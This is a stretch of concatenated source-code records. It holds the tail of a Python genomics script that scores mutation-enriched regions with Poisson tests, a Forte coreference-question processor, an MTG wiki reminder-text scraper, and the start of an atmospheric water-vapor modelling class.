\"--ctrl_BAM_json\",\n help=\"Ctrl BAM json, meta data information in .json format, generated from \",required=True)\n\n parser.add_argument(\"-n\", \"--treat_BAM_json\",\n help=\"Treat BAM json, meta data information in .json format, generated from \",required=True)\n\n parser.add_argument(\"-o\", \"--output\",\n help=\"Output file, default=stdout\",default=\"stdout\")\n\n parser.add_argument(\"--region_mutation_min_cutoff\",\n help=\"No less than this cutoff consider as a region mutant read, default=1\",default=1, type=int) \n\n parser.add_argument(\"--query_mutation_type\",\n help=\"Reads mutation type, which considered contain useful information, default=CT,GA\",default=\"CT,GA\")\n\n parser.add_argument(\"--query_mutation_min_cutoff\",\n help=\"An alignment contain mutation number lower than this, considered as 'non_mut_align', or as 'mut_align', default=2\",default=2, type=int)\n\n 
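# Together with --query_mutation_min_cutoff above, the three *_max_cutoff\n    # options below classify every alignment: reads with fewer query-type\n    # mutations than the min cutoff count as 'non_mut_align', the rest as\n    # 'mut_align'; alignments above a max cutoff are set aside as\n    # '*_high_mismatch' (e.g. Bismark mapping artifacts) instead of being counted.\n\n    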
parser.add_argument(\"--query_mutation_max_cutoff\",\n help=\"An alignment contain mutation number higher than this, considered as 'query_high_mismatch', which often caused by Bismark mapping error, default=16\",default=16, type=int)\n\n parser.add_argument(\"--other_mutation_max_cutoff\",\n help=\"An alignment contain mutation number higher than this, considered as 'other_high_mismatch', default=12\",default=12, type=int)\n\n parser.add_argument(\"--total_mutation_max_cutoff\",\n help=\"An alignment contain mutation number higher than this, considered as 'total_high_mismatch', default=24\",default=24, type=int)\n\n parser.add_argument(\"--to_large\",\n help=\"Means scale the larger sample up to the smaller sample. Usually, \\\n scaling down will bring down background noise, \\\n which is good for enrichment detection. default=False\",default=False, type=bool)\n\n parser.add_argument(\"--scale_reads_count\",\n help=\"Scaled final output region signal, default=100e6 Usually, default=100e6\",default=int(100e6), type=int)\n\n parser.add_argument(\"--mpmat_header\",\n help=\"If set True, means mpmat table contain header line, default=False\",default=False, type=bool)\n\n parser.add_argument(\"--lambda_method\",\n help=\"Can be set as 'ctrl_max', 'treat_max', 'max', default=ctrl_max\",default=\"ctrl_max\")\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # load the paramters\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n ARGS = parser.parse_args()\n\n mpmat_filename = ARGS.mpmat_table\n ctrl_bam_filename = ARGS.ctrl_BAM\n treat_bam_filename = ARGS.treat_BAM\n \n query_mut_type_list = ARGS.query_mutation_type.split(\",\")\n region_mut_min_cutoff = ARGS.region_mutation_min_cutoff\n query_mut_min_cutoff = ARGS.query_mutation_min_cutoff\n query_mut_max_cutoff = ARGS.query_mutation_max_cutoff\n other_mut_max_cutoff = ARGS.other_mutation_max_cutoff\n total_mut_max_cutoff = ARGS.total_mutation_max_cutoff\n \n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # make full cmd\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n full_cmd_str = \"python find-significant-mpmat.py \\n \\\n --mpmat_table {mpmat_table} \\n \\\n --ctrl_BAM {ctrl_BAM} \\n \\\n --treat_BAM {treat_BAM} \\n \\\n --reference {reference} \\n \\\n --genome_effective_json {genome_effective_json} \\n \\\n --ctrl_BAM_json {ctrl_BAM_json} \\n \\\n --treat_BAM_json {treat_BAM_json} \\n \\\n --output {output} \\n \\\n --query_mutation_type {query_mutation_type} \\n \\\n --region_mutation_min_cutoff {region_mutation_min_cutoff} \\n \\\n --query_mutation_min_cutoff {query_mutation_min_cutoff} \\n \\\n --query_mutation_max_cutoff {query_mutation_max_cutoff} \\n \\\n --other_mutation_max_cutoff {other_mutation_max_cutoff} \\n \\\n --total_mutation_max_cutoff {total_mutation_max_cutoff} \\n \\\n --scale_reads_count {scale_reads_count} \\n \\\n --lambda_method {lambda_method} \\n \\\n --mpmat_header {mpmat_header} \\\n \".format(\n mpmat_table = ARGS.mpmat_table,\n ctrl_BAM = ARGS.ctrl_BAM,\n treat_BAM = ARGS.treat_BAM,\n reference = ARGS.reference,\n genome_effective_json = ARGS.genome_effective_json,\n ctrl_BAM_json = ARGS.ctrl_BAM_json,\n treat_BAM_json = ARGS.treat_BAM_json,\n output = ARGS.output,\n query_mutation_type = ARGS.query_mutation_type,\n region_mutation_min_cutoff = ARGS.region_mutation_min_cutoff,\n query_mutation_min_cutoff = ARGS.query_mutation_min_cutoff,\n query_mutation_max_cutoff = 
ARGS.query_mutation_max_cutoff,\n other_mutation_max_cutoff = ARGS.other_mutation_max_cutoff,\n total_mutation_max_cutoff = ARGS.total_mutation_max_cutoff,\n scale_reads_count = ARGS.scale_reads_count,\n lambda_method = ARGS.lambda_method,\n mpmat_header = ARGS.mpmat_header\n )\n\n sys.stderr.write(\"\\n\" + \"-\" * 80 + \"\\n\")\n sys.stderr.write(full_cmd_str)\n sys.stderr.write(\"\\n\" + \"-\" * 80 + \"\\n\")\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # check input bam file\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n check_res = check_input_bam_file(ctrl_bam_filename)\n\n if check_res == 1:\n raise IOError(\"BAM not exisit!\")\n\n elif check_res == 2:\n raise IOError(\"BAM not sorted by coordinate!\")\n\n elif check_res == 3:\n raise IOError(\"BAM doesn't contain index file!\")\n\n\n check_res = check_input_bam_file(treat_bam_filename)\n\n if check_res == 1:\n raise IOError(\"BAM not exisit!\")\n\n elif check_res == 2:\n raise IOError(\"BAM not sorted by coordinate!\")\n\n elif check_res == 3:\n raise IOError(\"BAM doesn't contain index file!\")\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # check other file exist\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n if not os.path.exists(ARGS.mpmat_table):\n raise IOError(\"--mpmat_table does not exist! \")\n\n if not os.path.exists(ARGS.reference):\n raise IOError(\"--reference does not exist! \")\n\n if not os.path.exists(ARGS.genome_effective_json):\n raise IOError(\"--genome_effective_json does not exist! \")\n\n if not os.path.exists(ARGS.ctrl_BAM_json):\n raise IOError(\"--ctrl_BAM_json does not exist! \")\n\n if not os.path.exists(ARGS.treat_BAM_json):\n raise IOError(\"--treat_BAM_json does not exist! \")\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # load json file\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # load meta data dict\n meta_data_dict = {}\n\n # load ctrl \n ctrl_meta_dict = json.load(open(ARGS.ctrl_BAM_json, \"rb\"))\n meta_data_dict[\"ctrl\"] = ctrl_meta_dict[\"count_dict\"].copy()\n\n # load treat\n treat_meta_dict = json.load(open(ARGS.treat_BAM_json, \"rb\"))\n meta_data_dict[\"treat\"] = treat_meta_dict[\"count_dict\"].copy() \n\n # test key \n if treat_meta_dict[\"count_dict\"].keys() != ctrl_meta_dict[\"count_dict\"].keys():\n raise ValueError(\"Ctrl json and Treat json file not match!\")\n\n # add total key to the dict \n meta_data_dict[\"ctrl\"] = _count_dict_sum_up(meta_data_dict[\"ctrl\"])\n meta_data_dict[\"treat\"] = _count_dict_sum_up(meta_data_dict[\"treat\"])\n\n # load genome count json \n genome_base_count_dict = None\n with open(ARGS.genome_effective_json,\"r\") as genome_info_file:\n genome_base_count_dict = json.load(genome_info_file)\n\n # make scale factor dict\n scale_factor_dict = _calculate_scale_dict(meta_data_dict, to_large_state=False).copy()\n\n # make normalize scale factor\n nomalize_scale_factor_dict = _calculate_scale_dict(meta_data_dict, to_large_state=False, scale_reads_count=ARGS.scale_reads_count).copy()\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # load genome as dict\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n sys.stderr.write(\"Start to load genome ... 
\\t %s \\n\" % (time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())))\n\n genome_dict = load_reference_fasta_as_dict(ref_fasta_path=ARGS.reference, ref_name_list=\"All\")\n\n sys.stderr.write(\"Start to load genome. Done! \\t %s \\n\" % (time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())))\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # calculate genome and chromosome background\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n bg_dict = {\n \"ctrl\" : {}, \n \"treat\" : {}\n }\n\n # genome background\n ctrl_bg_genome_lambda = meta_data_dict[\"ctrl\"][\"total\"][\"mut_align_count\"] / 1.0 / scale_factor_dict[\"ctrl\"][\"total\"][\"all_align_count.scale_factor\"] / (genome_base_count_dict[\"total\"][\"A\"] + genome_base_count_dict[\"total\"][\"T\"] + genome_base_count_dict[\"total\"][\"C\"] + genome_base_count_dict[\"total\"][\"G\"]) * 300\n treat_bg_genome_lambda = meta_data_dict[\"treat\"][\"total\"][\"mut_align_count\"] / 1.0 / scale_factor_dict[\"treat\"][\"total\"][\"all_align_count.scale_factor\"] / (genome_base_count_dict[\"total\"][\"A\"] + genome_base_count_dict[\"total\"][\"T\"] + genome_base_count_dict[\"total\"][\"C\"] + genome_base_count_dict[\"total\"][\"G\"]) * 300\n\n bg_dict[\"ctrl\"][\"genome_bg\"] = ctrl_bg_genome_lambda\n bg_dict[\"treat\"][\"genome_bg\"] = treat_bg_genome_lambda\n\n # chromosome backround\n for ref_name in meta_data_dict[\"ctrl\"].keys():\n ctrl_bg_chr_lambda = meta_data_dict[\"ctrl\"][ref_name][\"mut_align_count\"] / 1.0 / scale_factor_dict[\"ctrl\"][ref_name][\"all_align_count.scale_factor\"] / (genome_base_count_dict[ref_name][\"A\"] + genome_base_count_dict[ref_name][\"T\"] + genome_base_count_dict[ref_name][\"C\"] + genome_base_count_dict[ref_name][\"G\"]) * 300\n treat_bg_chr_lambda = meta_data_dict[\"treat\"][ref_name][\"mut_align_count\"] / 1.0 / scale_factor_dict[\"treat\"][ref_name][\"all_align_count.scale_factor\"] / (genome_base_count_dict[ref_name][\"A\"] + genome_base_count_dict[ref_name][\"T\"] + genome_base_count_dict[ref_name][\"C\"] + genome_base_count_dict[ref_name][\"G\"]) * 300\n \n bg_dict[\"ctrl\"][ref_name] = ctrl_bg_chr_lambda\n bg_dict[\"treat\"][ref_name] = treat_bg_chr_lambda\n\n # print background info to stderr\n sys.stderr.write(\"-\" * 80 + \"\\n\")\n sys.stderr.write(\"Out background info: \\t %s \\n\" % (time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())))\n sys.stderr.write(json.dumps(bg_dict, encoding=\"utf-8\", sort_keys=True, indent=4, separators=(', ', ': ')) + \"\\n\")\n sys.stderr.write(\"-\" * 80 + \"\\n\")\n\n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n # load mpmat and calculate \n # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n ctrl_bam_obj = pysam.AlignmentFile(ctrl_bam_filename, \"rb\")\n treat_bam_obj = pysam.AlignmentFile(treat_bam_filename, \"rb\")\n \n mpmat_file = open(mpmat_filename, \"rb\")\n mpmat_header = None\n mpmat_header_list = []\n\n if ARGS.mpmat_header:\n mpmat_header = mpmat_file.readline()\n mpmat_header_list = mpmat_header.strip().split(\"\\t\")\n\n # store pvalue in each region\n poisson_pvalue_list = []\n\n mpmat_info_dict = {\n \"ctrl_all_count\" : [],\n \"treat_all_count\" : [],\n \"ctrl_mut_count\" : [],\n \"treat_mut_count\" : [],\n \"ctrl_all_count.norm\" : [],\n \"treat_all_count.norm\" : [],\n \"ctrl_mut_count.norm\" : [],\n \"treat_mut_count.norm\" : [],\n \"log2FC_all_count\" : [],\n \"log2FC_mut_count\" : []\n }\n\n for line_idx, line in 
enumerate(mpmat_file):\n        if line_idx % 100 == 0:\n            sys.stderr.write(\"Processing line number: %s \\t %s \\n\" % (line_idx + 1, time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())))\n\n        line_list = line.strip().split(\"\\t\")\n\n        try:\n            mpmat_chr_name = line_list[0]\n            mpmat_start = int(line_list[1])\n            mpmat_end = int(line_list[2])\n        except:\n            raise ValueError(\"Input mpmat file has to contain chr_name, region_start, region_end in the first three columns, separated by \\\\t\")\n\n        ctrl_mpmat_count_dict = \\\n        get_mpmat_region_count(\n            in_bam_obj = ctrl_bam_obj,\n            mpmat_chr_name = mpmat_chr_name,\n            mpmat_region_start = mpmat_start,\n            mpmat_region_end = mpmat_end,\n            ref_genome_dict = genome_dict,\n            query_mismatch_type_list = query_mut_type_list, \n            other_mismatch_type_list = \"All\",\n            region_mismatch_type_list = query_mut_type_list,\n            region_query_mut_min_cutoff = region_mut_min_cutoff,\n            query_mut_max_cutoff = query_mut_max_cutoff,\n            total_mut_max_cutoff = total_mut_max_cutoff,\n            other_mut_max_cutoff = other_mut_max_cutoff\n        )\n\n        treat_mpmat_count_dict = \\\n        get_mpmat_region_count(\n            in_bam_obj = treat_bam_obj,\n            mpmat_chr_name = mpmat_chr_name,\n            mpmat_region_start = mpmat_start,\n            mpmat_region_end = mpmat_end,\n            ref_genome_dict = genome_dict,\n            query_mismatch_type_list = query_mut_type_list, \n            other_mismatch_type_list = \"All\",\n            region_mismatch_type_list = query_mut_type_list,\n            region_query_mut_min_cutoff = region_mut_min_cutoff,\n            query_mut_max_cutoff = query_mut_max_cutoff,\n            total_mut_max_cutoff = total_mut_max_cutoff,\n            other_mut_max_cutoff = other_mut_max_cutoff\n        )\n\n        # region lambda\n        ctrl_mpmat_lambda = ctrl_mpmat_count_dict[\"region_mut_count\"] / 1.0 / scale_factor_dict[\"ctrl\"][mpmat_chr_name][\"all_align_count.scale_factor\"] \n        treat_mpmat_lambda = treat_mpmat_count_dict[\"region_mut_count\"] / 1.0 / scale_factor_dict[\"treat\"][mpmat_chr_name][\"all_align_count.scale_factor\"] \n\n        # all reads lambda \n        ctrl_mpmat_lambda_all = ctrl_mpmat_count_dict[\"all_align_count\"] / 1.0 / scale_factor_dict[\"ctrl\"][mpmat_chr_name][\"all_align_count.scale_factor\"] \n        treat_mpmat_lambda_all = treat_mpmat_count_dict[\"all_align_count\"] / 1.0 / scale_factor_dict[\"treat\"][mpmat_chr_name][\"all_align_count.scale_factor\"] \n\n        # make lambda list \n        ctrl_bg_lambda_list = [\n            bg_dict[\"ctrl\"][\"genome_bg\"],\n            bg_dict[\"ctrl\"][mpmat_chr_name],\n            ctrl_mpmat_lambda \n        ]\n\n        treat_bg_lambda_list = [\n            bg_dict[\"treat\"][\"genome_bg\"],\n            bg_dict[\"treat\"][mpmat_chr_name]\n        ]\n\n        bg_lambda_list = [\n            bg_dict[\"ctrl\"][\"genome_bg\"],\n            bg_dict[\"ctrl\"][mpmat_chr_name],\n            ctrl_mpmat_lambda,\n            bg_dict[\"treat\"][\"genome_bg\"],\n            bg_dict[\"treat\"][mpmat_chr_name]\n        ]\n\n        # select bg lambda\n        if ARGS.lambda_method == \"ctrl_max\":\n            bg_lambda = max(ctrl_bg_lambda_list)\n\n        elif ARGS.lambda_method == \"treat_max\":\n            bg_lambda = max(treat_bg_lambda_list)\n\n        elif ARGS.lambda_method == \"max\":\n            bg_lambda = max(bg_lambda_list)\n\n        else:\n            raise ValueError(\"--lambda_method has to be 'ctrl_max', 'treat_max' or 'max'\")\n\n        # mut reads get pvalue \n        mut_pvalue = poisson_test(treat_mpmat_lambda, bg_lambda, alternative=\"larger\", method=\"score\")[1]\n        poisson_pvalue_list.append(mut_pvalue)\n\n        # all reads get pvalue \n        # all_pvalue = poisson_test(treat_mpmat_lambda_all, ctrl_mpmat_lambda_all, alternative=\"larger\", method=\"score\")[1]\n\n        # calculate normalized signal\n        # (total counts are scaled by the all-read factor, mutant counts by the mutant-read factor)\n        mpmat_ctrl_all_count_norm = ctrl_mpmat_count_dict[\"all_align_count\"] / 1.0 / nomalize_scale_factor_dict[\"ctrl\"][mpmat_chr_name][\"all_align_count.scale_factor\"]\n        mpmat_ctrl_mut_count_norm = ctrl_mpmat_count_dict[\"region_mut_count\"] / 1.0 / nomalize_scale_factor_dict[\"ctrl\"][mpmat_chr_name][\"mut_align_count.scale_factor\"]\n\n        mpmat_treat_all_count_norm = treat_mpmat_count_dict[\"all_align_count\"] / 1.0 / nomalize_scale_factor_dict[\"treat\"][mpmat_chr_name][\"all_align_count.scale_factor\"]\n        mpmat_treat_mut_count_norm = treat_mpmat_count_dict[\"region_mut_count\"] / 1.0 / nomalize_scale_factor_dict[\"treat\"][mpmat_chr_name][\"mut_align_count.scale_factor\"]\n\n        # calculate log2 fold change\n        # if mpmat_ctrl_all_count_norm != 0:\n        #     log2FC_all_count = math.log(mpmat_treat_all_count_norm / 1.0 / mpmat_ctrl_all_count_norm, 2)\n        # else:\n        #     log2FC_all_count = math.log(mpmat_treat_all_count_norm / 1.0, 2)\n\n        # if mpmat_ctrl_mut_count_norm != 0:\n        #     log2FC_mut_count = math.log(mpmat_treat_mut_count_norm / 1.0 / mpmat_ctrl_mut_count_norm, 2)\n        # else:\n        #     log2FC_mut_count = math.log(mpmat_treat_mut_count_norm / 1.0, 2)\n\n        # All -> calculate log2 fold change fix \n        if mpmat_ctrl_all_count_norm != 0:\n            all_count_FC = mpmat_treat_all_count_norm / 1.0 / mpmat_ctrl_all_count_norm\n        else:\n            all_count_FC = mpmat_treat_all_count_norm / 1.0\n\n        if all_count_FC > 0:\n            log2FC_all_count = math.log(all_count_FC, 2)\n        else:\n            log2FC_all_count = \"NA\"\n\n        # Mut -> calculate log2 fold change fix \n        if mpmat_ctrl_mut_count_norm != 0:\n            mut_count_FC = mpmat_treat_mut_count_norm / 1.0 / mpmat_ctrl_mut_count_norm\n        else:\n            mut_count_FC = mpmat_treat_mut_count_norm / 1.0\n\n        if mut_count_FC > 0:\n            log2FC_mut_count = math.log(mut_count_FC, 2)\n        else:\n            log2FC_mut_count = \"NA\"\n\n        # add all info into dict\n        mpmat_info_dict[\"ctrl_all_count\"].append(ctrl_mpmat_count_dict[\"all_align_count\"])\n        mpmat_info_dict[\"treat_all_count\"].append(treat_mpmat_count_dict[\"all_align_count\"])\n\n        mpmat_info_dict[\"ctrl_mut_count\"].append(ctrl_mpmat_count_dict[\"region_mut_count\"])\n        mpmat_info_dict[\"treat_mut_count\"].append(treat_mpmat_count_dict[\"region_mut_count\"])\n\n        mpmat_info_dict[\"ctrl_all_count.norm\"].append(mpmat_ctrl_all_count_norm)\n        mpmat_info_dict[\"treat_all_count.norm\"].append(mpmat_treat_all_count_norm)\n\n        mpmat_info_dict[\"ctrl_mut_count.norm\"].append(mpmat_ctrl_mut_count_norm)\n        mpmat_info_dict[\"treat_mut_count.norm\"].append(mpmat_treat_mut_count_norm)\n\n        mpmat_info_dict[\"log2FC_all_count\"].append(log2FC_all_count)\n        mpmat_info_dict[\"log2FC_mut_count\"].append(log2FC_mut_count)\n\n        # add pvalue into list\n        # poisson_pvalue_list.append(max(mut_pvalue, all_pvalue))\n\n        # add lambda into list \n        # treat_lambda_list.append(treat_mpmat_lambda)\n        # ctrl_lambda_list.append(ctrl_mpmat_lambda)\n\n        # treat_all_lambda_list.append(treat_mpmat_lambda_all)\n        # ctrl_all_lambda_list.append(ctrl_mpmat_lambda_all)\n\n        # run_bg_lambda_list.append(bg_lambda)\n\n    # close file\n    mpmat_file.close()\n    ctrl_bam_obj.close()\n    treat_bam_obj.close()\n\n    # End for loop and fix pvalue to FDR\n    FDR_qvalue = multi.multipletests(np.array(poisson_pvalue_list), alpha=0.05, method=\"fdr_bh\", is_sorted=False)\n    FDR_qvalue_vec = FDR_qvalue[1]\n\n    # out final mpmat \n    if ARGS.output == \"stdout\":\n        out_file = sys.stdout\n    else:\n        out_file = open(ARGS.output, \"wb\")\n\n    out_header_list = [\n        \"chr_name\",\n        \"region_start\",\n        \"region_end\",\n        \"ctrl_count\",\n        \"treat_count\",\n        \"ctrl_mut_count\",\n        \"treat_mut_count\",\n        \"ctrl_count.norm\",\n        \"treat_count.norm\",\n        \"ctrl_mut_count.norm\",\n        \"treat_mut_count.norm\",\n        \"log2_FC\",\n        \"log2_FC_mut\",\n        \"p_value\",\n        \"FDR\"\n    ]\n\n    with 
open(mpmat_filename, \"rb\") as mpmat_raw_file:\n # out header \n mpmat_header_str = \"\\t\".join(out_header_list)\n out_file.write(mpmat_header_str + \"\\n\")\n\n if ARGS.mpmat_header:\n header = mpmat_raw_file.readline()\n\n for index, line in enumerate(mpmat_raw_file):\n line_list = line.strip().split(\"\\t\")[:3]\n \n append_info_list = [\n mpmat_info_dict[\"ctrl_all_count\"][index],\n mpmat_info_dict[\"treat_all_count\"][index],\n mpmat_info_dict[\"ctrl_mut_count\"][index],\n mpmat_info_dict[\"treat_mut_count\"][index],\n mpmat_info_dict[\"ctrl_all_count.norm\"][index],\n mpmat_info_dict[\"treat_all_count.norm\"][index],\n mpmat_info_dict[\"ctrl_mut_count.norm\"][index],\n mpmat_info_dict[\"treat_mut_count.norm\"][index],\n mpmat_info_dict[\"log2FC_all_count\"][index],\n mpmat_info_dict[\"log2FC_mut_count\"][index],\n poisson_pvalue_list[index],\n FDR_qvalue_vec[index]\n ]\n\n line_list += append_info_list\n line_str = \"\\t\".join(map(str,line_list))\n out_file.write(line_str + \"\\n\")\n\n # close output file \n if ARGS.output != \"stdout\":\n out_file.close()\n\n\n\n\n\n\n\n\n \n\n\n# 2019-12-28\n\n","sub_path":"code/find-significant-mpmat-V02.py","file_name":"find-significant-mpmat-V02.py","file_ext":"py","file_size_in_byte":28141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9239779","text":"from forte.data.multi_pack import MultiPack\nfrom forte.processors.base import MultiPackProcessor\n\nfrom edu.cmu import CorefQuestion, SuggestionQuestion\n\n\nclass QuestionCreator(MultiPackProcessor):\n \"\"\"\n Create questions for the coreference tasks.\n \"\"\"\n\n def _process(self, input_pack: MultiPack):\n q = CorefQuestion(input_pack)\n q.question_body = \"Place: Do you think the two events \" \"happen at the same place?\"\n q.options = [\n \"Exactly the same\",\n \"The places overlap\",\n \"Not at all\",\n \"Cannot determine\",\n ]\n input_pack.add_entry(q)\n\n q = CorefQuestion(input_pack)\n q.question_body = \"Time: Do you think the two events \" \"happen at the same time?\"\n q.options = [\n \"Exactly the same\",\n \"They overlap in time\",\n \"Not at all\",\n \"Cannot determine\",\n ]\n input_pack.add_entry(q)\n\n q = CorefQuestion(input_pack)\n q.question_body = \"Participants: Do you think the two events\" \" have the same participants?\"\n q.options = [\n \"Exactly the same\",\n \"They share some participants\",\n \"Not at all\",\n \"Cannot determine\",\n ]\n input_pack.add_entry(q)\n\n q = CorefQuestion(input_pack)\n q.question_body = \"Inclusion: Do you think one of the events\" \" is part of the other?\"\n q.options = [\n \"Yes, the left event is part of right one\",\n \"Yes, the right event is part of left one\",\n \"No, they are exactly the same\",\n \"Cannot determine\",\n ]\n input_pack.add_entry(q)\n\n q = SuggestionQuestion(input_pack)\n q.question_body = \"You consider these two to be different, \" \"could you tell us why?\"\n q.options = [\n \"One event is part of the other event.\",\n \"Some event details (e.g. 
time, location, participants) \" \"are conflicting.\",\n            \"There is not enough information.\",\n            \"The two events are completely un-related.\",\n            \"Other reasons\",\n        ]\n        input_pack.add_entry(q)\n","sub_path":"multidoc-forte/processors/evidence_questions.py","file_name":"evidence_questions.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"599968067","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule: wikiinfo.py\nAuthor: zlamberty\nCreated: 2017-09-09\n\nDescription:\n    utilities for parsing the mtg wiki at https://mtg.gamepedia.com/\n\nUsage:\n\n\n\"\"\"\n\nimport logging\nimport re\n\nimport requests\n\n# ----------------------------- #\n#   Module Constants            #\n# ----------------------------- #\n\nlogger = logging.getLogger(__name__)\n\n# tell requests to shut up\nlogging.getLogger('requests').setLevel(logging.WARN)\nlogging.getLogger('urllib3').setLevel(logging.WARN)\n\n\n# ----------------------------- #\n#   Main routine                #\n# ----------------------------- #\n\ndef _keyword_urls():\n    # two categories: keyword actions and keyword abilities\n    for templatename in ['Template:Infobox action', 'Template:Infobox keyword']:\n        url = 'https://mtg.gamepedia.com/api.php'\n        resp = requests.get(url,\n                            params={'action': 'query',\n                                    'list': 'embeddedin',\n                                    'eititle': templatename,\n                                    'eilimit': 1000,\n                                    'format': 'json'})\n        j = resp.json()\n        for item in j['query']['embeddedin']:\n            yield item\n\n\ndef reminder_text():\n    \"\"\"get a dictionary of keyword: reminder text values (useful for text\n    analytics)\n\n    \"\"\"\n    remtext = {}\n    for kwdict in _keyword_urls():\n        kwname = kwdict['title'].lower()\n        kwid = kwdict['pageid']\n        try:\n            resp = requests.get(url='https://mtg.gamepedia.com/api.php',\n                                params={'action': 'parse',\n                                        'pageid': kwid,\n                                        'prop': 'wikitext',\n                                        'format': 'json'})\n            infobox = resp.json()['parse']['wikitext']['*']\n\n            remtextnow = re.search('\\| reminder = (.*)', infobox, re.I)\n            remtextnow = remtextnow.groups()[0].lower()\n            if remtextnow[-1] == '.':\n                remtextnow = remtextnow[:-1]\n\n            remtext[kwname] = remtextnow\n\n            logger.debug('SUCCESS: {}'.format(kwname))\n        except AttributeError:\n            logger.debug('SUCCESS: {} (no reminder text)'.format(kwname))\n        except Exception as e:\n            logger.warning('FAILURE: {}'.format(kwname))\n            logger.debug('\\texception: {}'.format(e))\n\n    return remtext\n","sub_path":"mtg/extract/wikiinfo.py","file_name":"wikiinfo.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"283758446","text":"import math\nimport numpy as np\n\n\nclass use_ARIS(object):\n    \"\"\"\n    This class is used to convert the atmosphere data that is obtained from\n    ARIS to a useful datatype. 
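In short, it turns a set of ARIS extra path length (dEPL) strips into a matrix of precipitable water vapor via the linear relation pwv = pwv_0 + dEPL/a, with a = 6.3003663. 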
It loads in the atmosphere data, converts it to\n    a matrix and converts the Extra Path Length to the precipitable water vapor\n    using the Smith-Weintraub equation for the Extra Path Length and the Ideal\n    Gas Law (later, hopefully the VanDerWaals law).\n    \"\"\"\n\n    a = 6.3003663 #m\n    h = 1000 #m\n\n    def __init__(self, x_length_strip, sourcepath, prefix_filename, pwv_0, grid, windspeed, time, max_num_strips, separation, beam_radius, loadCompletePwvMap = 0):\n        #make function to convert EPL to pwv\n        self.pwv_0 = pwv_0\n        self.prefix_filename = prefix_filename\n        self.grid = grid\n        self.windspeed = windspeed\n        self.max_num_strips = max_num_strips\n        self.sourcepath = sourcepath\n        self.x_length_strip = x_length_strip\n        self.filtered_pwv_matrix = \"None\"\n        self.separation = separation\n        self.beam_radius = beam_radius\n        if loadCompletePwvMap:\n            self.load_complete_pwv_map()\n        else:\n            self.initialize_pwv_matrix(time)\n\n    @staticmethod\n    def calc_e_from_pwv(pwv):\n        \"\"\"Calculates the simple partial pressure of water vapor, using the\n        VanDerWaals equation of state and values for the parameters a and b\n        taken from 'CRC Handbook for chemistry and physics', 64th edition.\n\n        Returns\n        ------------\n        e: scalar or array\n            partial pressure of water vapor\n            Unit: kPa\n        \"\"\"\n        a = 5.536e-4\n        b = 3.049e-5\n        T = 273\n        rho = 55.4e3\n        R = 8.314459\n        e = R * T * pwv/(use_ARIS.h - b * pwv * rho) - (a * (pwv**2) * (rho**2)) / (use_ARIS.h**2)\n        return e\n\n    def calc_e_from_EPL(self, EPL):\n        \"\"\"Calculates the partial pressure of water vapor, using the Smith-Weintraub\n        formula for Extra Path Length (DOI: 10.1109/JRPROC.1953.274297)\n\n        Returns\n        ------------\n        e: scalar or array\n            partial pressure of water vapor\n            Unit: kPa\n        \"\"\"\n        k2 = 70.4e2 #K/kPa\n        k3 = 3.739e7 #K**2/kPa\n        T = 273\n        e = 1e6/self.h * EPL/(k2/T + k3/(T**2))\n        return e\n\n    def load_complete_pwv_map(self):\n        \"\"\"Loads the previously saved pwv map. This map is already filtered with\n        a Gaussian beam.\n        \"\"\"\n        print('Number of atmosphere strips loaded: ', self.max_num_strips)\n        #path = self.path_model + '/Data/output_ARIS/complete_filtered_pwv_map.txt'\n        path = self.sourcepath.joinpath('complete_filtered_pwv_map.txt')\n        self.filtered_pwv_matrix = np.loadtxt(path)\n\n    def initialize_pwv_matrix(self, time):\n        \"\"\"Initializes the pwv_matrix property of the 